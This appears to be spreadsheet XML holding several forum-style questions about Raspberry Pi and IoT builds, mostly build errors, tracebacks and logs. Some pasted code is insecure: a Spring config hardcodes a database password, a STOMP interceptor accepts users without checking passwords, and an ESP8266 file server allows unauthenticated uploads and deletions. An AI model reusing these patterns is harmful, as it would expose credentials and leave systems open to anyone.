hsm_client_tpm.c:(.text+0x1131): undefined reference to `TSS_GetTpmProperty'
hsm_client_tpm.c:(.text+0x11f8): undefined reference to `TPM2B_ID_OBJECT_Unmarshal'
hsm_client_tpm.c:(.text+0x1258): undefined reference to `TPM2B_ENCRYPTED_SECRET_Unmarshal'
hsm_client_tpm.c:(.text+0x12b8): undefined reference to `TPM2B_PRIVATE_Unmarshal'
hsm_client_tpm.c:(.text+0x1318): undefined reference to `TPM2B_ENCRYPTED_SECRET_Unmarshal'
hsm_client_tpm.c:(.text+0x1377): undefined reference to `TPM2B_PUBLIC_Unmarshal'
hsm_client_tpm.c:(.text+0x13d7): undefined reference to `UINT16_Unmarshal'
hsm_client_tpm.c:(.text+0x14fa): undefined reference to `TPM2_ActivateCredential'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `initialize_tpm_device':
hsm_client_tpm.c:(.text+0x15dc): undefined reference to `TSS_CreatePwAuthSession'
hsm_client_tpm.c:(.text+0x1632): undefined reference to `Initialize_TPM_Codec'
hsm_client_tpm.c:(.text+0x16a9): undefined reference to `TSS_CreatePersistentKey'
hsm_client_tpm.c:(.text+0x1720): undefined reference to `TSS_CreatePersistentKey'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `hsm_client_tpm_destroy':
hsm_client_tpm.c:(.text+0x1885): undefined reference to `Deinit_TPM_Codec'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `hsm_client_tpm_get_endorsement_key':
hsm_client_tpm.c:(.text+0x1a8f): undefined reference to `TPM2B_PUBLIC_Marshal'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `hsm_client_tpm_get_storage_key':
hsm_client_tpm.c:(.text+0x1c63): undefined reference to `TPM2B_PUBLIC_Marshal'
/usr/local/lib/libhsm_security_client.a(hsm_client_tpm.c.o): In function `hsm_client_tpm_sign_data':
hsm_client_tpm.c:(.text+0x1e01): undefined reference to `SignData'
collect2: error: ld returned 1 exit status
Makefile:570: recipe for target 'iotProcess' failed
make: *** [iotProcess] Error 1
I really have no idea why the program isn't compiling with make (Autotools) but with CMakeLists.txt.</t>
  </si>
  <si>
    <t>Secure Communication</t>
  </si>
  <si>
    <t>Protocol
uint8_t rx_byte = 0x00;
//Message length variables
uint8_t messageLength = 0;
uint8_t receivedMessageLength = 0;
//Message content variable
uint8_t messageContent;
//Variable to check incoming serial content
uint8_t serialCurrent; 
//Counter used for verifying the som variable
int initialCounter = 0;
//Message progression variables
boolean messageBegun = false; 
boolean messageInProgress = false;
//Variables currently used to read status info coming from the teensy (CURRENTLY RANDOMIZED INFO)
int currNumRefresh = 0;
int currMicroC = 0;
int currMicroD = 0;
int currMicroE = 0;
int currPressureC = 0; 
int currPressureD = 0; 
int currPressureE = 0; 
int currValveStatusNumC = 0; 
int currValveStatusNumD = 0; 
int currValveStatusNumE = 0;
int currFluid = 0;
//Buffer for sending information from Arduino to the webpage
char statusbuf[256]; 
//Valve 1
String valveStatusC = "Closed";
String valveTubePropsC = "175px solid #00ADEF";
String valveColorC = "red";
//Valve 2
String valveStatusD = "Closed";
String valveTubePropsD = "175px solid #00ADEF";
String valveColorD = "red";
//Valve 3
String valveStatusE = "Closed";
String valveTubePropsE = "175px solid #00ADEF";
String valveColorE = "red";
//Variables for sending test message to teensy
long prevTimeTest = 0;
long testInterval = 5000;
//Format Bytes
String formatBytes(size_t bytes){
  if(mySerial)  
    mySerial.println("formatBytes FUNC");
  if (bytes &lt; 1024){
    return String(bytes)+"B";
  } //end if 
  else if(bytes &lt; (1024 * 1024)){
    return String(bytes/1024.0)+"KB";
  } //end else if
  else if(bytes &lt; (1024 * 1024 * 1024)){
    return String(bytes/1024.0/1024.0)+"MB";
  } //end else if
  else {
    return String(bytes/1024.0/1024.0/1024.0)+"GB";
  } //end else
} //end function formatBytes
//Content Type for File System
String getContentType(String filename)
{
  if(server.hasArg("download")) return "application/octet-stream";
  else if(filename.endsWith(".htm")) return "text/html";
  else if(filename.endsWith(".html")) return "text/html";
  else if(filename.endsWith(".css")) return "text/css";
  else if(filename.endsWith(".js")) return "application/javascript";
  else if(filename.endsWith(".png")) return "image/png";
  else if(filename.endsWith(".gif")) return "image/gif";
  else if(filename.endsWith(".jpg")) return "image/jpeg";
  else if(filename.endsWith(".ico")) return "image/x-icon";
  else if(filename.endsWith(".xml")) return "text/xml";
  else if(filename.endsWith(".pdf")) return "application/x-pdf";
  else if(filename.endsWith(".zip")) return "application/x-zip";
  else if(filename.endsWith(".gz")) return "application/x-gzip";
  if(mySerial)  
    mySerial.println("getContentType FUNC");
  return "text/plain";
} //end function getContentType
//File Read for File System
bool handleFileRead(String path)
{
  if(mySerial)  
    mySerial.println("handleFileRead: " + path);
  if(path.endsWith("/")) path += "index.htm";
  String contentType = getContentType(path);
  String pathWithGz = path + ".gz";
  if(SPIFFS.exists(pathWithGz) || SPIFFS.exists(path))
  {
    if(SPIFFS.exists(pathWithGz))
      path += ".gz";
    File file = SPIFFS.open(path, "r");
    if(mySerial)
        mySerial.println("TEST: " + path + " FILE OPEN: " + file.size());
    size_t sent = server.streamFile(file, contentType);
    if(mySerial)
        mySerial.println("TEST: " + path + " SIZE: " + file.size());
    file.close();
    if(mySerial)
        mySerial.println("TEST: " + path + " FILE CLOSE");
    return true;
  } //end if 
  return false;
} //end function handleFileRead
//File Upload for File System
void handleFileUpload(){
  if(server.uri() != "/edit") return;
  HTTPUpload&amp; upload = server.upload();
  if(upload.status == UPLOAD_FILE_START)
  {
    String filename = upload.filename;
    if(!filename.startsWith("/")) 
        filename = "/"+filename;
    if(mySerial)
    {
        mySerial.print("handleFileUpload Name: "); 
        mySerial.println(filename);
    } //end if
    fsUploadFile = SPIFFS.open(filename, "w");
    filename = String();
  } //end if 
  else if(upload.status == UPLOAD_FILE_WRITE)
  {
    if(mySerial)
    {
        mySerial.print("handleFileUpload Data: "); 
        mySerial.println(upload.currentSize);
    } //end if
    if(fsUploadFile)
      fsUploadFile.write(upload.buf, upload.currentSize);
  } //end else if
  else if(upload.status == UPLOAD_FILE_END)
  {
    if(fsUploadFile)
      fsUploadFile.close();
    if(mySerial)
    {
        mySerial.print("handleFileUpload Size: "); 
        mySerial.println(upload.totalSize);
    } //end if
  } //end else if
} //end function handleFileUpload
//File Delete for File System
void handleFileDelete()
{
  if(server.args() == 0) return server.send(500, "text/plain", "BAD ARGS");
  String path = server.arg(0);
  if(mySerial)
    mySerial.println("handleFileDelete: " + path);
  if(path == "/")
    return server.send(500, "text/plain", "BAD PATH");
  if(!SPIFFS.exists(path))
    return server.send(404, "text/plain", "FileNotFound");
  SPIFFS.remove(path);
  server.send(200, "text/plain", "");
  path = String();
} //end function handleFileDelete
//File Create for File System
void handleFileCreate()
{
  if(server.args() == 0)
    return server.send(500, "text/plain", "BAD ARGS");
  String path = server.arg(0);
  if(mySerial)
      mySerial.println("handleFileCreate: " + path);
  if(path == "/")
    return server.send(500, "text/plain", "BAD PATH");
  if(SPIFFS.exists(path))
    return server.send(500, "text/plain", "FILE EXISTS");
  File file = SPIFFS.open(path, "w");
  if(file)
    file.close();
  else
    return server.send(500, "text/plain", "CREATE FAILED");
  server.send(200, "text/plain", "");
  path = String();
} //end function handleFileCreate
void handleFileList() 
{
  if(!server.hasArg("dir")) 
  {
      server.send(500, "text/plain", "BAD ARGS"); 
      return;
  } //end if
  String path = server.arg("dir");
  if(mySerial)
    mySerial.println("handleFileList: " + path);
  Dir dir = SPIFFS.openDir(path);
  path = String();
  String output = "[";
  while(dir.next())
  {
    File entry = dir.openFile("r");
    if (output != "[") output += ',';
    bool isDir = false;
    output += "{\"type\":\"";
    output += (isDir)?</t>
  </si>
  <si>
    <t>Spring App Config:
@Configuration
@EnableWebMvc
@EnableScheduling
@ComponentScan({"ro.i2cWebAppController.app.controller","ro.i2cWebAppController.app.serv","ro.i2cWebAppController.app.schedule"})
@Import({SpringSecurityConfig.class})
@EnableJpaRepositories({"ro.i2cWebAppController.app.repo"})
public class AppConfig extends WebMvcConfigurerAdapter {
    private static final Logger logger = Logger.getLogger(AppConfig.class);
    @Override
    public void addResourceHandlers(ResourceHandlerRegistry registry) {
        registry.addResourceHandler("/res/**").addResourceLocations("/WEB-RES/");
        registry.addResourceHandler("/**/**.ico").addResourceLocations("/WEB-RES/img/favicon.ico");
    }
    @Override
    public void configureDefaultServletHandling(DefaultServletHandlerConfigurer configurer) {
        configurer.enable();
    }
    @Bean
    public ViewResolver viewResolver(ContentNegotiationManager manager) {
        InternalResourceViewResolver resolver = new InternalResourceViewResolver();
        resolver.setPrefix("views/");
        resolver.setSuffix(".jsp");
        return resolver;
    }
    @Bean(name = "entityManagerFactory")
    public LocalContainerEntityManagerFactoryBean sessionFactory() {
        LocalContainerEntityManagerFactoryBean lcemfb = new LocalContainerEntityManagerFactoryBean();
        HibernateJpaVendorAdapter hjva = new HibernateJpaVendorAdapter();
        hjva.setShowSql(true);
        //persistence unit
        lcemfb.setDataSource(dataSource());
        lcemfb.setJpaVendorAdapter(hjva);
        lcemfb.setPackagesToScan("ro.i2cWebAppController.app.model");
        lcemfb.setJpaPropertyMap(hibernateProperties());
        return lcemfb;
    }
    @Bean
    public DataSource dataSource() {
        BasicDataSource dataSource = new BasicDataSource();
        dataSource.setDriverClassName("com.mysql.jdbc.Driver");
        if(isUnix()){
            dataSource.setUrl("jdbc:mysql://localhost:3306/i2cwac?autoReconnect=true");
        }else{
            dataSource.setUrl("jdbc:mysql://192.168.1.30:3306/i2cwac?autoReconnect=true");
        }
        dataSource.setUsername("i2cwac");
        dataSource.setPassword("Stefan1234");
        dataSource.setInitialSize(5);
        dataSource.setMaxTotal(20);
        dataSource.setMaxIdle(10);
        dataSource.setMinIdle(5);
        dataSource.setMaxWaitMillis(2000);
        return dataSource;
    }
    @Bean
    @Autowired
    public JpaTransactionManager transactionManager(EntityManagerFactory lcemfb) {
        JpaTransactionManager txManager = new JpaTransactionManager();
        txManager.setEntityManagerFactory(lcemfb);
        return txManager;
    }
    @Bean
    public PersistenceExceptionTranslationPostProcessor exceptionTranslation() {
        return new PersistenceExceptionTranslationPostProcessor();
    }
    Map&lt;String,String&gt; hibernateProperties() {
        Map&lt;String,String&gt; propMap = new HashMap&lt;&gt;();
        propMap.put("hibernate.hbm2ddl.auto", "validate");
        propMap.put("hibernate.dialect", "org.hibernate.dialect.MySQL5InnoDBDialect");
        propMap.put("hibernate.globally_quoted_identifiers", "true");
        propMap.put("hibernate.show_sql", "true");
        return propMap;
    }
    @Bean
    public Integer ambientTemperature(){
        return new Integer(0);
    }
    @Bean
    public SystemInformationService systemInformationService(){
        return new SystemInformationServiceImpl();
    }
    @Bean
    public Boolean isUnix(){
        if(System.getProperty("os.name").toLowerCase().indexOf("win")&gt;=0){
            logger.info("isUnix : false because : " + System.getProperty("os.name"));
            return false;
        }else{
            logger.info("isUnix : true because : " + System.getProperty("os.name"));
            return true;
        }
    }
    @Bean
    public I2CBus i2CBus(){
        I2CBus i2CBus = null;
        if (isUnix()) {
            int count = 0;
            int maxTries = 10;
            while (true) {
                try {
                    i2CBus = I2CFactory.getInstance(I2CBus.BUS_1);
                    break;
                } catch (IOException e) {
                    ++count;
                    logger.error("I2CBUS try " + count);
                    if (count == maxTries) e.printStackTrace();
                }
            }
        }
        if (i2CBus == null){
            logger.info("I2CBUS is NULL");
        }else{
            logger.info("Got I2CBUS " + i2CBus.toString());
        }
        return i2CBus;
    }
}
Scheduler class:
@Component
public class RaspberryPiScheduler {
    @Autowired
    SystemInformationService systemInformationService;
    @Autowired
    RaspberryPiDataService raspberryPiDataService;
    @Autowired
    Boolean isUnix;
    private static final Logger logger = Logger.getLogger(RaspberryPiScheduler.class);
    /**
     * Scheduled method to write data from Raspberry Pi sensors
     */
    @Scheduled(fixedDelay = 5000)
    public void writeRaspberryPiData(){
        logger.info("Insert raspberrypi stats");
        if(isUnix){
            try {
                raspberryPiDataService.save(new RaspberryPiData(
                        systemInformationService.getCpuTemperature(),
                        systemInformationService.getCpuVoltage(),
                        systemInformationService.getMemoryUsed(),
                        systemInformationService.getMemoryFree(),
                        systemInformationService.getMemoryBuffers(),
                        systemInformationService.getMemoryVoltageSDRam_C(),
                        systemInformationService.getMemoryVoltageSDRam_I(),
                        systemInformationService.getMemoryVoltageSDRam_P()
                        ));
            } catch (Exception e) {
                logger.error("writeRaspberryPiData error",e);
            }
        }
    }
}
Base Repo:
@NoRepositoryBean
public interface BaseRepo&lt;T, ID extends Serializable&gt; extends JpaRepository&lt;T, ID&gt;, JpaSpecificationExecutor&lt;T&gt; {
}
Right now I don't find the error in the log, but in the past it crashed with SIGILL error.</t>
  </si>
  <si>
    <t>When I then entered the authorization code however, it printed the following error:
Using format_exc from the traceback-module, I got the following information:
Traceback (most recent call last):
  File "test.py", line 18, in &lt;module&gt;
    access_token, user_id = auth_flow.finish(auth_code)
  File "/usr/local/lib/python2.7/dist-packages/dropbox/oauth.py", line 180, in finish
    return self._finish(code, None)
  File "/usr/local/lib/python2.7/dist-packages/dropbox/oauth.py", line 50, in _finish
    url = self.build_url(Dropbox.HOST_API, '/oauth2/token')
  File "/usr/local/lib/python2.7/dist-packages/dropbox/oauth.py", line 111, in build_url
    return "https://%s%s" % (self._host, self.build_path(target, params))
  File "/usr/local/lib/python2.7/dist-packages/dropbox/oauth.py", line 89, in build_path
    params = params.copy()
AttributeError: 'str' object has no attribute 'copy'
It seems the build_path method expects a dict 'params' and receives a string instead.</t>
  </si>
  <si>
    <t>$ swift upload s3perf s3perf-testfile1.txt 
Object PUT failed: http://10.0.0.253:8080/v1/AUTH_test/s3perf/s3perf-testfile1.txt 
503 Service Unavailable  [first 60 chars of response] &lt;html&gt;&lt;h1&gt;Service 
Unavailable&lt;/h1&gt;&lt;p&gt;The server is currently
$ tail -f /var/log/swift/storage1.error
...
May 18 20:55:44 raspberrypi object-server: STDERR: (927) accepted 
('127.0.0.1', 45684)
May 18 20:55:44 raspberrypi object-server: ERROR __call__ error with PUT 
/d1/40/AUTH_test/s3perf/testfile : #012Traceback (most recent call 
last):#012  File "/home/pi/swift/swift/obj/server.py", line 1105, in 
__call__#012    res = getattr(self, req.method)(req)#012  File 
"/home/pi/swift/swift/common/utils.py", line 1626, in _timing_stats#012    
resp = func(ctrl, *args, **kwargs)#012  File 
"/home/pi/swift/swift/obj/server.py", line 814, in PUT#012    
writer.put(metadata)#012  File "/home/pi/swift/swift/obj/diskfile.py", 
line 2561, in put#012    super(DiskFileWriter, self)._put(metadata, 
True)#012  File "/home/pi/swift/swift/obj/diskfile.py", line 1566, in 
_put#012    tpool_reraise(self._finalize_put, metadata, target_path, 
cleanup)#012  File "/home/pi/swift/swift/common/utils.py", line 3536, in 
tpool_reraise#012    raise resp#012IOError: [Errno 13] Permission denied 
(txn: txfbf08bffde6d4657a72a5-00591dee30)
May 18 20:55:44 raspberrypi object-server: STDERR: 127.0.0.1 - - 
[18/May/2017 18:55:44] "PUT /d1/40/AUTH_test/s3perf/testfile HTTP/1.1" 
500 875 0.015646 (txn: txfbf08bffde6d4657a72a5-00591dee30)
Also the proxy.error file contains an error message ERROR 500 Expect: 100-continue From Object Server.</t>
  </si>
  <si>
    <t>Object PUT failed: http://10.0.0.253:8080/v1/AUTH_test/s3perf-testbucket/testfiles/s3perf-testfile1.txt 
503 Service Unavailable  [first 60 chars of response] 
&lt;html&gt;&lt;h1&gt;Service Unavailable&lt;/h1&gt;&lt;p&gt;The server is currently
The storage1.error log file still says:
May 24 13:15:15 raspberrypi object-server: ERROR __call__ error with PUT 
/sdb1/484/AUTH_test/s3perf-testbucket/testfiles/s3perf-testfile1.txt :
#012Traceback (most recent call last):#012  File 
"/home/pi/swift/swift/obj/server.py", line 1105, in __call__#012    res = 
getattr(self, req.method)(req)#012  File 
"/home/pi/swift/swift/common/utils.py", line 1626, in _timing_stats#012    
resp = func(ctrl, *args, **kwargs)#012  File 
"/home/pi/swift/swift/obj/server.py", line 814, in PUT#012    
writer.put(metadata)#012  File "/home/pi/swift/swift/obj/diskfile.py", 
line 2561, in put#012    super(DiskFileWriter, self)._put(metadata, 
True)#012  File "/home/pi/swift/swift/obj/diskfile.py", line 1566, in
 _put#012    tpool_reraise(self._finalize_put, metadata, target_path, 
cleanup)#012  File "/home/pi/swift/swift/common/utils.py", line 3536, in 
tpool_reraise#012    raise resp#012IOError: [Errno 13] Permission denied  
(txn: txdfe3c7f704be4af8817b3-0059256b43)
Update 7
The issue is still not fixed, but I have now a working Swift service on the Raspberry Pi.</t>
  </si>
  <si>
    <t>Here is the code for Login.java:
And for the MainForm.java:
package Kiosk;
import javax.swing.JLabel;
import javax.swing.WindowConstants;
import javax.swing.table.DefaultTableCellRenderer;
import javax.swing.table.DefaultTableModel;
import com.pi4j.wiringpi.Gpio;
import com.pi4j.wiringpi.GpioInterrupt;
import com.pi4j.wiringpi.GpioInterruptListener;
import com.pi4j.wiringpi.GpioInterruptEvent;
import com.pi4j.wiringpi.GpioUtil;
public class MainForm extends javax.swing.JFrame {
    public static volatile int pulses = 0;
    public static boolean display = true;
    public MainForm() {
        initComponents();
}
    @SuppressWarnings("unchecked")
    /**
     * @param args the command line arguments
     */
    public static void main(String args[]) {
        /* Create and display the form */
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new MainForm().setVisible(true);
            }
        });
        //create listener //bill coin pulses
        GpioInterrupt.addListener(new GpioInterruptListener() {
            @Override
            public void pinStateChange(GpioInterruptEvent event) {
                if (event.getPin() == 0) {
                    if (event.getState() == false) {
                        pulses++;
                        display = true;
                    }
                }
                if (event.getPin() == 7) {
                    if (event.getState() == false) {
                        int bpulses = 0;
                        bpulses++;
                        pulses += bpulses * 10;
                        display = true;
                    }
                }
            }
        });
        //setup wiring pi
        if (Gpio.wiringPiSetup() == -1) {
            System.out.println("Setup Failed!</t>
  </si>
  <si>
    <t>Z    09:56   0:00  \_ [hydra_pmi_proxy] &lt;defunct&gt;
root46930.00.798043204?Ss09:290:00  _ sshd: pi [priv]
  pi47000.00.398041528?S09:290:00_ sshd: pi@pts/0
UPDATE:(logs)
host: raspberrypi
==================================================================================================
mpiexec options:
----------------
  Base path: /bin/
  Launcher: (null)
  Debug level: 1
  Enable X: -1
  Global environment:
  -------------------
    MANPATH=:/usr/local/man
    SHELL=/bin/bash
    TERM=linux
    XDG_SESSION_COOKIE=40a78f4b44fccc138ec16d4052434c66-1387121860.786856-628795747
    HUSHLOGIN=FALSE
    USER=pi
    LD_LIBRARY_PATH=:/usr/local/lib:/usr/local/lib64
    LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=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00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
    MAIL=/var/mail/pi
    PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/usr/local/bin
    PWD=/home/pi
    LANG=en_GB.UTF-8
    SHLVL=1
    HOME=/home/pi
    LOGNAME=pi
    _=/bin/mpiexec
  Hydra internal environment:
  ---------------------------
    MPICH_ENABLE_CKPOINT=1
    GFORTRAN_UNBUFFERED_PRECONNECTED=y
    Proxy information:
    *********************
      [1] proxy: raspberrypi (1 cores)
      Exec list: (null) (2 processes); 
==================================================================================================
[mpiexec@raspberrypi] Timeout set to -1 (-1 means infinite)
[mpiexec@raspberrypi] Got a control port string of raspberrypi:51572
Proxy launch args: /bin/hydra_pmi_proxy --control-port raspberrypi:51572 --debug --rmk user --launcher ssh --demux poll --pgid 0 --retries 10 --usize -2 --proxy-id 
Arguments being passed to proxy 0:
--version 1.5 --iface-ip-env-name MPICH_INTERFACE_HOSTNAME --hostname raspberrypi --global-core-map 0,1,1 --pmi-id-map 0,0 --global-process-count 2 --auto-cleanup 1 --pmi-kvsname kvs_6057_0 --pmi-process-mapping (vector,(0,1,1)) --ckpointlib blcr --ckpoint-prefix /tmp/ --global-inherited-env 16 'MANPATH=:/usr/local/man' 'SHELL=/bin/bash' 'TERM=linux' 'XDG_SESSION_COOKIE=40a78f4b44fccc138ec16d4052434c66-1387121860.786856-628795747' 'HUSHLOGIN=FALSE' 'USER=pi' 'LD_LIBRARY_PATH=:/usr/local/lib:/usr/local/lib64' 'LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=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00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:' 'MAIL=/var/mail/pi' 'PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:/usr/local/bin' 'PWD=/home/pi' 'LANG=en_GB.UTF-8' 'SHLVL=1' 'HOME=/home/pi' 'LOGNAME=pi' '_=/bin/mpiexec' --global-user-env 0 --global-system-env 2 'MPICH_ENABLE_CKPOINT=1' 'GFORTRAN_UNBUFFERED_PRECONNECTED=y' --proxy-core-count 1 --exec --exec-appnum 0 --exec-proc-count 2 --exec-local-env 0 --exec-wdir /home/pi --exec-args 0 
[mpiexec@raspberrypi] Launch arguments: /bin/hydra_pmi_proxy --control-port raspberrypi:51572 --debug --rmk user --launcher ssh --demux poll --pgid 0 --retries 10 --usize -2 --proxy-id 0 
hydra_pmi_proxy and test2 seems to be zombie
root      2221  0.0  0.6  22288  2920 ?</t>
  </si>
  <si>
    <t>@Slf4j
@Service
public class AuthChannelInterceptorAdapter implements ChannelInterceptor {
    private static final String USERNAME_HEADER = "login";
    private static final String PASSWORD_HEADER = "passcode";
    @Autowired
    private UserDetailsService userDetailsService;
    @Autowired
    private AuthenticationManager authenticationManager;
    @Override
    public Message&lt;?&gt; preSend(final Message&lt;?&gt; message, final MessageChannel channel) throws AuthenticationException {
        final StompHeaderAccessor accessor = MessageHeaderAccessor.getAccessor(message, StompHeaderAccessor.class);
        log.info("Trying to authentication...");
        log.info(accessor.toString());
        if (StompCommand.CONNECT == accessor.getCommand()) {
            final String username = accessor.getFirstNativeHeader(USERNAME_HEADER);
            final String password = accessor.getFirstNativeHeader(PASSWORD_HEADER);
            UserDetails userDetails = userDetailsService.loadUserByUsername(username);
            UsernamePasswordAuthenticationToken user = new UsernamePasswordAuthenticationToken(userDetails, password, userDetails.getAuthorities());
            accessor.setUser(user);
            log.info("StompCommand.CONNECT ");
        }
        return message;
    }
    /*...*/
}
Dependencies 
buildscript {
    ext {
        springBootVersion = '2.1.1.RELEASE'
    }
    repositories {
        mavenCentral()
    }
    dependencies {
        classpath("org.springframework.boot:spring-boot-gradle-plugin:${springBootVersion}")
    }
}
apply plugin: 'java'
apply plugin: 'eclipse'
apply plugin: 'org.springframework.boot'
apply plugin: 'io.spring.dependency-management'
group = 'com.smartpi'
version = '0.0.1-SNAPSHOT'
sourceCompatibility = 1.8
repositories {
    mavenCentral()
}
dependencies {
    implementation('org.springframework.boot:spring-boot-starter-data-jpa')
    implementation('org.springframework.boot:spring-boot-starter-web')
    implementation('org.springframework.security:spring-security-config')
    implementation('org.springframework.security:spring-security-core')
    implementation('org.springframework.security:spring-security-crypto')
    implementation('org.springframework.security:spring-security-web')
    compile group: 'org.springframework.boot', name: 'spring-boot-starter-websocket', version: '2.0.4.RELEASE'
    compile group: 'org.springframework', name: 'spring-messaging', version: '4.0.0.RELEASE'
    compile group: 'org.springframework.security', name: 'spring-security-messaging', version: '4.0.1.RELEASE'
    compile group: 'org.springframework.security.oauth', name: 'spring-security-oauth2', version: '1.0.0.RELEASE'
    compile group: 'org.springframework.boot', name: 'spring-boot-starter-security', version: '2.1.1.RELEASE'
    compile group: 'javax.servlet', name: 'jstl'
    compile group: 'org.apache.tomcat.embed', name: 'tomcat-embed-jasper'
    runtimeOnly('com.h2database:h2')
    compileOnly('org.projectlombok:lombok')
    testImplementation('org.springframework.boot:spring-boot-starter-test')
}
My client is ESP8260 ESP-01 as I mentioned before.</t>
  </si>
  <si>
    <t>', error(111, 'Connection refused'))) error:
ERROR:root:Error updating auth using default
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/haystack/management/commands/update_index.py", line 188, in handle_label
    self.update_backend(label, using)
  File "/usr/local/lib/python2.7/dist-packages/haystack/management/commands/update_index.py", line 233, in update_backend
    do_update(backend, index, qs, start, end, total, verbosity=self.verbosity, commit=self.commit)
  File "/usr/local/lib/python2.7/dist-packages/haystack/management/commands/update_index.py", line 96, in do_update
    backend.update(index, current_qs, commit=commit)
  File "/usr/local/lib/python2.7/dist-packages/haystack/backends/elasticsearch_backend.py", line 193, in update
    bulk(self.conn, prepped_docs, index=self.index_name, doc_type='modelresult')
  File "/usr/local/lib/python2.7/dist-packages/elasticsearch/helpers/__init__.py", line 188, in bulk
    for ok, item in streaming_bulk(client, actions, **kwargs):
  File "/usr/local/lib/python2.7/dist-packages/elasticsearch/helpers/__init__.py", line 160, in streaming_bulk
    for result in _process_bulk_chunk(client, bulk_actions, raise_on_exception, raise_on_error, **kwargs):
  File "/usr/local/lib/python2.7/dist-packages/elasticsearch/helpers/__init__.py", line 89, in _process_bulk_chunk
    raise e
ConnectionError: ConnectionError(('Connection aborted.</t>
  </si>
  <si>
    <t>this is my code
and this is the result
02-20 19:57:07.465 12103-12103/ir.shafadoc.handset D/line: IP address       HW type     Flags       HW address            Mask     Device
02-20 19:57:07.466 12103-12103/ir.shafadoc.handset D/line: 192.168.1.33     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.466 12103-12103/ir.shafadoc.handset D/line: 192.168.1.26     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.467 12103-12103/ir.shafadoc.handset D/line: 192.168.1.19     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.467 12103-12103/ir.shafadoc.handset D/line: 192.168.1.12     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.467 12103-12103/ir.shafadoc.handset D/line: 192.168.1.31     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.468 12103-12103/ir.shafadoc.handset D/line: 192.168.1.24     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.468 12103-12103/ir.shafadoc.handset D/line: 192.168.1.17     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.469 12103-12103/ir.shafadoc.handset D/line: 192.168.1.10     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.470 12103-12103/ir.shafadoc.handset D/line: 192.168.1.29     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.470 12103-12103/ir.shafadoc.handset D/line: 192.168.1.22     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.470 12103-12103/ir.shafadoc.handset D/line: 192.168.1.15     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.471 12103-12103/ir.shafadoc.handset D/line: 192.168.1.8      0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.471 12103-12103/ir.shafadoc.handset D/line: 192.168.1.1      0x1         0x2         c0:a0:bb:9a:e4:ad     *        wlan0
02-20 19:57:07.472 12103-12103/ir.shafadoc.handset D/line: 192.168.1.27     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.472 12103-12103/ir.shafadoc.handset D/line: 192.168.1.20     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.472 12103-12103/ir.shafadoc.handset D/line: 192.168.1.13     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.473 12103-12103/ir.shafadoc.handset D/line: 192.168.1.32     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.473 12103-12103/ir.shafadoc.handset D/line: 192.168.1.25     0x1         0x0         00:00:00:00:00:00     *        wlan0
02-20 19:57:07.473 12103-12103/ir.shafadoc.handset D/line: 192.168.1.18     0x1         0x0         00:00:00:00:00:00     *        wlan0
